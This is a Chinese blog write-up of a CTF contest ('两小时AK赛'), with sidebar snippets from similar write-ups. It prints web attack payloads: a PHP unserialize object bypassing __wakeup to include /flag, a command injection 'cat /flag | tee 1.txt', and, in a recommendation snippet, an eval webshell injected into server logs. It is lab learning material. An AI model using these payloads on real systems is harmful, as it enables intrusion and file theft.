两小时AK赛

最新推荐文章于 2023-10-02 01:12:09 发布
最新推荐文章于 2023-10-02 01:12:09 发布
阅读量329 收藏
点赞数
分类专栏: 比赛复现 文章标签: 两小时AK赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124690445
版权

WEB - 签到了!!!你会玩2048么?

main.js
在这里插入图片描述

WEB - easy_unser

__wakeup可以把序列化后的属性个数改一下就可以绕过了。

?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>";}

MISC - 签签

base64解码一下就可以了
在这里插入图片描述

WEB - 你猜猜是什么注入?

经测试cat,/,|,tee可以用,虽然页面不能回显,但是我们可以把结果保存到文件中。

?catf1ag=cat /flag | tee 1.txt
#把flag内容保存到1.txt中

在这里插入图片描述
当然这题应该也可以外带,但我没有试成功。

succ3
关注
专栏目录
catf1ag 小时ak
zip471642048的博客
05-09 790
目录Crypto[小时AK] - CRYPTO - 怎么会多一个呢[小时AK] - CRYPTO - 高实在是高[小时AK] - CRYPTO - 栓qMisc[小时AK] - MISC - 签签[小时AK] - MISC - 奇怪的字符[小时AK] - MISC - 这4什么好看的 Crypto [小时AK] - CRYPTO - 怎么会多一个呢 yafu分解n可以分解出三个因子 import libnum import gmpy2 n=73551482761993440
2021团体程序设计天梯
weixin_44836722的博客
04-26 1504
直接输出一句话 知乎上有个宝宝问:“小时内如何学完 C 语言?”当然,问的是“学完”并不是“学会”。 假设一本 C 语言教科书有 N 个字,这个宝宝每分钟能看 K 个字,看了 M 分钟。还剩多少字没有看? 输入格式: 输入在一行中给出 3 个正整数,分别是 N(不超过 400 000),教科书的总字数;K(不超过 3 000),是宝宝每分钟能看的字数;M(不超过 120),是宝宝看书的分钟数。 题目保证宝宝看完的字数不超过 N。 输出格式: 在一行中输出宝宝还没有看的字数。
Catf1ag,小时AK
Pai_Space
05-21 279
1.[小时AK] - WEB - 签到了!!!你会玩2048么? 找到源码判断,找到 flag [小时AK] - MISC - 签签 catf1ag%7Bcc02061e-c88d-11ec-bedb-2cf05d955455%7D URL catf1ag{cc02061e-c88d-11ec-bedb-2cf05d955455} [小时AK] - MISC - 这4什么好看的 jpeg 图,查隐写 排除几个 .
catf1ag [小时AK] - WEB - easy_unser
weixin_56051888的博客
05-12 668
<?php //flag in /flag show_source('./index.php'); class catf1ag{ public $target='flag'; function __wakeup(){ $this->target = "catf1ag is CTF platform!"; } function __destruct(){ $fp = fopen("catf1ag.php","w"); ...
[小时AK] - WEB - 签到了——你会玩2048么?
MrTreebook的博客
05-10 249
[小时AK] - WEB - 签到了!!!你会玩2048么?1.下载题目环境2.查看js代码 1.下载题目环境 2.查看js代码 直接ctrl + f 搜索flag即可得到flag
catf1ag CTF 小时AK Crypto writeup
qq_39492081的博客
05-11 676
目录 怎么会多一个呢 高实在是高 栓q 怎么会多一个呢 factordb分解出来三个结果,不过原理还是相同,根据欧拉函数的定义,此时 python脚本 from Crypto.Util.number import * n = 735514827619934401163782764028509760176739701176858793847127680540972670289742448670042385876583664631067035811076138834631808
从catf1ag 小时AK PWN/ATTACK 查杀总结应急响应常用命令指南
Aiwin的博客
05-12 812
从catf1ag的AK中PWN总结一下应急响应的常用命令。
2017 ICPC 区域小记
taotao 的大学墓志
12-05 1088
上周结束了新疆最后一场区域 ,我的ICPC区域之行就完全结束了。今年参加了3场区域(本来我校队伍少,哪知今年6场打进了5场),都打的不尽人意。因此迟迟没有写写总结.西安这一场算是打的最烂的一场了.我们周四出发,先去南京玩了一天,然后晚上才和另外一枝去秦皇岛的队伍分道。另一个队友还在福州打CSP,我和MYY 是早上5.到的西安,算来这是第二次来这里了,下午逛了下芙蓉园,晚上去永兴坊吃了点小吃,才
【随笔】2015年ICPC四省/邀请小结
企鹅学coding~
06-08 1217
因为这比槽点太多了,所以周日比完,周一就开始写文章吐槽了QAQ 这比真坑,真坑,真坑啊!!!(重要的事情要说三遍) 本次比是ICPC主办的东北,哈工大跟吉大可能是因为有了CCPC所以不来参加了吧,参的阵容略水,强校很少,所以我们也一直把此次比当做夺金的一大机会。之前周除了蓝桥杯那三天,其它时候都保证了每天做一场练习。 本次比是由大连海事大学承办,东北大学协办。话说这是我第一
模拟二补题报告
Xuanfeiliu的博客
10-02 78
模拟二补题报告,包含今日模拟的所有题目的思路和正确代码,以及后续需改进的方面。后附带有毫无价值的六张图片,谨慎观看。
[小时AK] - WEB - 你猜猜是什么注入?
weixin_56051888的博客
05-12 926
尝试了union注入、报错注入等都没成功...最后想到用Linux命令 先学习一下Linux命令: 一、Linux命令——ls列出目录下的内容 ls 命令为英文单词 list 的缩写,正如英文单词 list 的意思,其功能是列出指定目录下的内容及其相关属性信息。 1、列出所有文件(包括隐藏文件):[root@linuxliangxu ~]# ls -a 2、列出文件的详细信息: [root@linuxliangxu ~]# ls -l 3、列...
catf1ag CTF [小时AK] - MISC - 签签
weixin_56051888的博客
05-10 565
1、将图片下载下来 2、将图片在winhex中打开 观察到后面出现比较特殊的字符串,类似base64加密(Y2F0ZjFhZyU3QmNjMDIwNjFlLWM4OGQtMTFlYy1iZWRiLTJjZjA1ZDk1NTQ1NSU3RA==) 3、将字符串复制到解码器解码(Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具) ...
-------已搬运------CTFSHOW---WEB AK -- 包含日志 ---sql注入 ---- xxe ----
Zero_Adam的博客
04-29 773
目录:web0_签到_观己一、自己做:二、学到的&&不足:web1_观宇一、自己做:二、学到的:三、学习WP:web2_观星00000+一、自己做:三、看WP: web0_签到_观己 一、自己做: 吐槽一句,ctfshow 的题就是 考知识点!! ,一点拖泥带水的。赞一个!!! <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d
ctfshow WEB AK
LYJ20010728的博客
06-14 4642
WEB AK签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload 签到_观己 考点 文件包含 思路 盲猜一波flag在根目录下,所以直接读取试试 Payload 源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){
catf1ag平台AK
weixin_53268624的博客
05-10 913
catf1ag AKwp
机房模拟欢乐AK
Amuseir的博客
09-14 290
隔壁的水题,下午和我们班的人一起做 本来停课的欢乐得很,然后教练突然考试(一般都是上午考),把我们吓尿了 然后教练又说三个小时 闻风丧胆...... 心态血崩 然后AK了2333333333 题目真的好水啊..... T1 题目描述 一眼秒杀 我们可以首先发现一个事实,首先我们假设一个任务的截止时间为s,完成它需要的时间是t 那么对于任何一个截止时间,最晚的开始时间就是s...
ctfshow-WEB_AK
qq_44657899的博客
08-01 5332
签到_观己(日志包含) 文件包含一般下面几种协议,不过这些协议这道题都用不起: 除了猜,还有日志包含。 首先访问file=/var/log/nginx/access.log看日志文件是否存在。 然后访问aaaaaaaaaaa,再查看日志文件,已经被记录到了日志文件中。 因为url中会被编码,所以在UA中加入一句话木马<?php @eval($_GET['pass']);?>,成功写入日志。 随后蚁剑链接:http://0bb8f2b6-74cb-4fd9-860d-a4d246c8aa1
基于ssm的二手车交易网站设计与实现.docx
最新发布
09-17
基于ssm的二手车交易网站设计与实现.docx
zotero 6 插件,包含茉莉花、DOI、绿青蛙、sci-hub等11个常用插件
09-17
zotero 6 插件,茉莉花、DOI、绿青蛙、sci-hub、Better notes、GPT、IF、PDF翻译、Style、TAG、影响因子
ctfshow web web ak观心
09-11
CTFShow的Web AK中,观心考点的payload可以参考以下内容。引用[1]提供了一系列关于Web AK观心考点的思路payload。引用中给出了一个源码示例,其中对传入的文件参数进行了校验。如果传入的文件名中包含"php"这个字符串,就会结束程序并输出错误信息,否则会通过include函数引入这个文件。引用给出了一个payload示例,其中api参数指定了一个XML文件的地址,city参数指定了一个城市代码。所以,ctfshow web web ak观心的payload可以是:http://96949238-64ea-4039-aeb8-5ef4593e9210.challenge.ctf.show/api.php?api=http://ip/2.xml&city=3。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值